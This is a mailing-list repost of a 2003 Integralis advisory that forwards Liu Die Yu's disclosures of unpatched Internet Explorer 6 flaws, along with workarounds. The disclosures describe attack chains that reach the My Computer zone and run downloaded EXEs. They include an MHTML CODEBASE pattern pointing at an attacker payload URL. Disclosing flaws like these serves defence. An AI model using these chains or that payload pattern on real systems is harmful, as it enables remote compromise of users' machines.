Hi List Just got this in: Cheers Dan -------------------------------------------------------------------- Integralis S3 Advise .. Integralis S3 Advise .. Integralis S3 Advise -------------------------------------------------------------------- Affected platforms: IE 6.0 with XP SP1 and MS03-048. Scope for attack: Remote via hostile web page / e-mail. Effect: Various up to and including remote code execution leading to compromise of the users machine. Resolution: Disable "Active Scripting" in the INTERNET zone. A whole slew of vulnerabilities in Internet Explorer have been released by prominent IE researcher Liu Die Yu. These affect IE 6 with all the latest patches applied. In other words they are no patches available for any of these problems. This presents a "vulnerability window" in which many desktops will remain vulnerable unless remedial action is taken immediately. Pete Philips pete@xxxxxxxxxxxxxxxxxxx ----------------------------------------------------------------- Integralis S3 Advise service The following message is reposted complete from the original source. It has not been modified by Integralis S3 in any way. ----------------------------------------------------------------- New "Clean" IE Remote Compromise [tested] OS:Win2k3,CN version IE: with MS03-048 installed. OS:WinXp, CN version Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16 [overview] By combining several vulnerabilities in Internet Explorer, an attacker can execute his EXE file on victim's system. ("Clean" means: there is no old published vulnerability involved in this exploit) [demo] There is a harmless demo: http://www.safecenter.net/UMBRELLAWEBV4/1stCleanRc/1stCleanRc-Demo/index.htm l (runs harmless demonstration executable) [technical details] First, use MhtRedirParsesLocalFile to parse a local file in an IFRAME, (Liu Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirParsesLocalFile) Then, use BackToFramedJpu to reach MYCOMPUTER zone. (Liu Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/BackToFramedJpu) At last, in MYCOMPUTER security zone, use MhtRedirLaunchInetExe to download the payload EXE file and execute it. (Liu Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirLaunchInetExe) [Workaround] Disable Active Scripting in INTERNET zone. [Greetings] greetings to: Drew Copley, dror, guninski and mkill. ----- all mentioned resources can always be found at UMBRELLA.MX.TC [people] LiuDieyuinchina [N0-@-Sp2m] yahoo.com.cn UMBRELLA.MX.TC ==> How to contact "Liu Die Yu" [message] A wise man learns from other's mistakes; a fool learns from his own. [Employment] I would like to work professionally as a security researcher/bug finder. See my resume at my site. I am very eager to work, flexible, and extremely productive. I have a top notch resume, with credentials from leading bug finders. I am willing to work per contract, relocate, or telecommute. [Give a Hand] I haven't got a job as a security researcher yet and my family don't support my security work - so, I don't have a computer of my own. Please consider about donating at: http://clik.to/donatepc ----------------------------------------------------------------- Integralis S3 Advise service The following message is reposted complete from the original source. It has not been modified by Integralis S3 in any way. ----------------------------------------------------------------- MHTML Redirection Leads to Downloading EXE and Executing [tested] OS:Win2k3,CN version IE: with MS03-048 installed. OS:WinXp, CN version Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16 [overview] A vulnerability in Internet Explorer is found: any attacker that can reach MYCOMPUTER security zone(a.k.a local zone) is able to download his EXE file and execute it. [demo] There is a harmless demo: http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirLaunchInetExe/MhtRedirLaunch InetExe-Demo.zip [technical details] There is a feature in Internet Explorer when it tries to retrieve a file embedded in an MHT file, like: mhtml:[Mhtml_File_Url]![Original_Resource_Url] If [Original_Resource_Url] cannot be retrieved from [Mhtml_File_Url], IE will try to download [Original_Resource_Url] and return the downloaded content. It's like as HTTP redirection. And CODEBASE execution is a URL-based security check. (Liu Die Yu's http://continue.to/trie ) So, in MYCOMPUTER security, point CODEBASE property of an OBJECT tag with unused CLSID to: mhtml:file:///C:\No_SUCH_MHT.MHT![Attaker_PayloadEXE_Url] and then, IE will download [Attaker_PayloadEXE_Url] and execute it. [Workaround] Disable Active Scripting in INTERNET zone. [Greetings] greetings to: Drew Copley, dror, guninski and mkill. ----- all mentioned resources can always be found at UMBRELLA.MX.TC [people] LiuDieyuinchina [N0-@-Sp2m] yahoo.com.cn UMBRELLA.MX.TC ==> How to contact "Liu Die Yu" [message] A wise man learns from other's mistakes; a fool learns from his own. [Employment] I would like to work professionally as a security researcher/bug finder. See my resume at my site. I am very eager to work, flexible, and extremely productive. I have a top notch resume, with credentials from leading bug finders. I am willing to work per contract, relocate, or telecommute. [Give a Hand] I haven't got a job as a security researcher yet and my family don't support my security work - so, I don't have a computer of my own. Please consider about donating at: http://clik.to/donatepc ----------------------------------------------------------------- Integralis S3 Advise service The following message is reposted complete from the original source. It has not been modified by Integralis S3 in any way. ----------------------------------------------------------------- BackToFramedJpu - a successor of BackToJpu attack [tested] OS:Win2k3,CN version IE: with MS03-048 installed. OS:WinXp, CN version Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16 [overview] A cross-zone scripting vulnerability has been found in Internet Explorer. If a webpage contains some subframe(either FRAME tag or IFRAME tag), its security zone may be compromised. [demo] There is a harmless demo: http://www.safecenter.net/UMBRELLAWEBV4/BackToFramedJpu/BackToFramedJpu-MyPa ge.htm [technical details] After applying MS03-048 patch, no javascript-protocol URL won't be stored in URL history list any more, which means classical "javascript-protocol URL in history" attack doesn't work any more. (Liu Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/BackMyParent2/index.html) However, if an attacker do the following things: Navigate a sub-frame in victim document to a javascript-protocol URL, (first, navigate sub-frame to attacker's page, and then navigate the sub-frame a javascript-protocol URL) and then navigate the top window away, At last,navigate back("history.back()"). the javascript-protocol URL will be loaded by the top window(victim document) and script in the javascript-protocol URL will be executed in the security zone of victim document - a.k.a cross-site/zone/domain scripting [Workaround] Disable Active Scripting in INTERNET zone. [Greetings] greetings to: Drew Copley, dror, guninski and mkill. ----- all mentioned resources can always be found at UMBRELLA.MX.TC [people] LiuDieyuinchina [N0-@-Sp2m] yahoo.com.cn UMBRELLA.MX.TC ==> How to contact "Liu Die Yu" [message] A wise man learns from other's mistakes; a fool learns from his own. [Employment] I would like to work professionally as a security researcher/bug finder. See my resume at my site. I am very eager to work, flexible, and extremely productive. I have a top notch resume, with credentials from leading bug finders. I am willing to work per contract, relocate, or telecommute. [Give a Hand] I haven't got a job as a security researcher yet and my family don't support my security work - so, I don't have a computer of my own. Please consider about donating at: http://clik.to/donatepc ----------------------------------------------------------------- Integralis S3 Advise service The following message is reposted complete from the original source. It has not been modified by Integralis S3 in any way. ----------------------------------------------------------------- HijackClickV2 - a successor of HijackClick attack [tested] OS:Win2k3,CN version IE: with MS03-048 installed. OS:WinXp, CN version Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16 [overview] After applying MS03-048, the original HijackClick exploit doesn't work any more. With method caching(a.k.a "SaveRef"), HijackClick works again. [demo] There is a harmless demo: http://www.safecenter.net/UMBRELLAWEBV4/HijackClickV2/HijackClickV2-MyPage.h tm [technical details] After applying MS03-048, the original HijackClick exploit doesn't work any more. (Liu Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/HijackClick/HijackClick-MyPage.HTM Because window.moveBy is inaccessible. Method caching attack can make window.moveBy accessible again. [Workaround] Disable Active Scripting in INTERNET zone. [Greetings] greetings to: Drew Copley, dror, guninski and mkill. ----- all mentioned resources can always be found at UMBRELLA.MX.TC [people] LiuDieyuinchina [N0-@-Sp2m] yahoo.com.cn UMBRELLA.MX.TC ==> How to contact "Liu Die Yu" [message] A wise man learns from other's mistakes; a fool learns from his own. [Employment] I would like to work professionally as a security researcher/bug finder. See my resume at my site. I am very eager to work, flexible, and extremely productive. I have a top notch resume, with credentials from leading bug finders. I am willing to work per contract, relocate, or telecommute. [Give a Hand] I haven't got a job as a security researcher yet and my family don't support my security work - so, I don't have a computer of my own. Please consider about donating at: http://clik.to/donatepc ----------------------------------------------------------------- Integralis S3 Advise service The following message is reposted complete from the original source. It has not been modified by Integralis S3 in any way. ----------------------------------------------------------------- Invalid ContentType may disclose cache directory [tested] OS:WinXp, CN version Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16 [overview] The problem lies in the download function of Internet Explorer. This can be exploited by malicious web pages to get cache directory including random names. [demo] There are two harmless demos: 1st, online demo, powered by ASP: http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/threadid10008-Demo 2nd, demo in ZIP format, powered by NETCAT: http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/threadid10008-Demo.zip [technical details] When CONTENTTYPE in HTTP response is invalid and file extension is "HTM", the downloaded HTM file will be opened in cache directory, in INTERNET security zone. In the 1st demo, this is done by the following ASP code: ---------- response.ContentType = "whocares" response.AddHeader "content-disposition", "inline; filename=test.htm" ---------- In the 2nd demo, this is done with the help of NETCAT. [Workaround] Disable Active Scripting in INTERNET zone, so HTML page opened in the cache can't send information back to the attacker. Note for "Invalid ContentType may disclose cache directory" This vulnerability("Invalid ContentType may disclose cache directory") doesn't work on all systems. ("Invalid ContentType may disclose cache directory", at http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/) Please note that execdror6 and LocalZoneInCache also depends on this vulnerability. (execdror6: http://www.safecenter.net/UMBRELLAWEBV4/execdror6/ LocalZoneInCache: http://www.safecenter.net/UMBRELLAWEBV4/LocalZoneInCache/) I have spent extra-ordinary time on this issue and here is all i know about it: First, The code was verified to work on a WinXp system(Simplified Chinese version) with all patches. Then, I sent LocalZoneInCache to HTTP-EQUIV, Dror Shalev and the Pull for testing: It works on Dror Shalev's WinXp machine(up-to-date) but it doesn't work on the Pull's Win2k system. (because he set killbit for Adodb.Stream activeX object.) Soon after that, HTTP-EQUIV found it does not work on his WinXp system(2-3 weeks old, with the latest IE patch). Then, to figure out what happened, i formatted disk and installed Win2k3 and WinXp(both Simplified Chinese version) and then applied the latest IE patch. Both remote compromise cases(LocalZoneInCache and execdror6) don't work any more. At last, i reproduced both remote compromise cases on MSIEv6 running on Simplified Chinese WinXp with the following patches: SP1;Q828750;Q330994;Q824145(a.k.a MS03-048) If you are using IE, please help me test it and send the result directly to my emailbox. Thanx in advance. [Greetings] greetings to: Drew Copley, dror, guninski and mkill. ----- all mentioned resources can always be found at UMBRELLA.MX.TC [people] LiuDieyuinchina [N0-@-Sp2m] yahoo.com.cn UMBRELLA.MX.TC ==> How to contact "Liu Die Yu" [Employment] I would like to work professionally as a security researcher/bug finder. See my resume at my site. I am very eager to work, flexible, and extremely productive. I have a top notch resume, with credentials from leading bug finders. I am willing to work per contract, relocate, or telecommute. [Give a Hand] I haven't got a job as a security researcher yet and my family don't support my security work - so, I don't have a computer of my own. Please consider about donating at: http://clik.to/donatepc ----------------------------------------------------------------- Integralis S3 Advise service The following message is reposted complete from the original source. It has not been modified by Integralis S3 in any way. ----------------------------------------------------------------- Cache Disclosure Leads to MYCOMPUTER Zone and Remote Compromise [tested] OS:WinXp, CN version Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16 [overview] By combining cache file disclosure and several other unpatched vulnerabilties, an malicious INTERNET page can reach MYCOMPUTER zone. The demo uses Adodb.Stream to launch a remote compromise attack. [demo] There are two harmless demos: Online demo, powered by ASP: http://www.safecenter.net/UMBRELLAWEBV4/LocalZoneInCache/LocalZoneInCache-De mo/index.html (runs harmless demonstration executable) [technical details] First, place an HTML file in IE cache directory and get its location. (Liu Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/index.html) Second, this HTML file can be parsed as an HTML page and treated as in MYCOMPUTER security zone. (Mindwarper of mlsecurity.com's http://www.mlsecurity.com/ie/ie.htm) (Liu Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/DblSlashForCache/DblSlashForCache-Co ntent.htm) At last, Overwrite NOTEPAD.EXE and make IE launch it by openning a view-source protocol URL: (HTTP-EQUIV of MALWARE 's http://www.securityfocus.com/archive/1/343521) [Workaround] Disable Active Scripting in INTERNET zone, so HTML page opened in the cache can't send information back to the attacker. [Greetings] greetings to: Drew Copley, dror, guninski, vadim and mkill. ----- all mentioned resources can always be found at UMBRELLA.MX.TC [people] LiuDieyuinchina [N0-@-Sp2m] yahoo.com.cn UMBRELLA.MX.TC ==> How to contact "Liu Die Yu" [Employment] I would like to work professionally as a security researcher/bug finder. See my resume at my site. I am very eager to work, flexible, and extremely productive. I have a top notch resume, with credentials from leading bug finders. I am willing to work per contract, relocate, or telecommute. [Give a Hand] I haven't got a job as a security researcher yet and my family don't support my security work - so, I don't have a computer of my own. Please consider about donating at: http://clik.to/donatepc ----------------------------------------------------------------- Integralis S3 Advise service The following message is reposted complete from the original source. It has not been modified by Integralis S3 in any way. ----------------------------------------------------------------- IE Remote Compromise by Getting Cache Location [tested] OS:WinXp, CN version Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16 [overview] With the help of LocalZoneInCache(refer to "[technical details]" part), an attacker can compromise a user's system even though the user has: 1. Customized IE cache directory, 2. Applied MS03-048 patch, 3. Set killbit for ADODB.STREAM ActiveX. [demo] online demo, powered by ASP: http://www.safecenter.net/UMBRELLAWEBV4/execdror6/execdror6-Demo/index.html (runs harmless demonstration executable) [technical details] execdror6 is derived from execdror5. (Liu Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/execdror5/) execdror6 differs from execdror5 in that: 1st, execdror6 uses LocalZoneInCache to reach MYCOMPUTER security zone. (Liu Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/LocalZoneInCache/index.html) 2nd, execdror6 gets IE cache directory directly from location.href. (LocalZoneInCache makes attaker's HTML page opened in cache directory.) [Workaround] Disable Active Scripting in INTERNET zone, so HTML page opened in the cache can't send information back to the attacker. [Greetings] greetings to: Drew Copley, dror, guninski, vadim and mkill. ----- all mentioned resources can always be found at UMBRELLA.MX.TC [people] LiuDieyuinchina [N0-@-Sp2m] yahoo.com.cn UMBRELLA.MX.TC ==> How to contact "Liu Die Yu" [Employment] I would like to work professionally as a security researcher/bug finder. See my resume at my site. I am very eager to work, flexible, and extremely productive. I have a top notch resume, with credentials from leading bug finders. I am willing to work per contract, relocate, or telecommute. [Give a Hand] I haven't got a job as a security researcher yet and my family don't support my security work - so, I don't have a computer of my own. Please consider about donating at: http://clik.to/donatepc ------------------------------------------------------------------------ The information you receive/contained herein is to keep you aware of developments in IT security that have general relevance to your IT systems environment. Our objective is to provide information to you as rapidly as possible to alert you to security threats, issues and potential solutions. In view of the expediency of the information the solutions described will not necessarily have been fully tested as to their applicability to your particular environment. Hence you use this information at your sole risk and liability. All trademarks are acknowledged as belonging to their respective owners. Visit the new FDL web - site designed to serve you better - http://www.fdl.co.uk This message has been sent from Fuerst Day Lawson Ltd and confirms that the email has been scanned and to the best of our knowledge is free from virus infection. The unauthorised use, disclosure, forwarding or copying of this message and any attachments is strictly prohibited. If you have received this message in error, please email moderator@xxxxxxxxx This message and any attachments, which are confidential and may be privileged, are for the use of the addressee(s) only. The views and opinions expressed in this email message are the author's own and may not reflect the views and opinions of Fuerst Day Lawson Ltd. ******************************************************** This Weeks Sponsor SeamlessPlanet.com Register your domain name for as low as $7.75 per year! Cheaper than Godaddy..same great service! http://SeamlessPlanet.com ******************************************************** To Unsubscribe, set digest or vacation mode or view archives use the below link. http://thethin.net/win2000list.cfm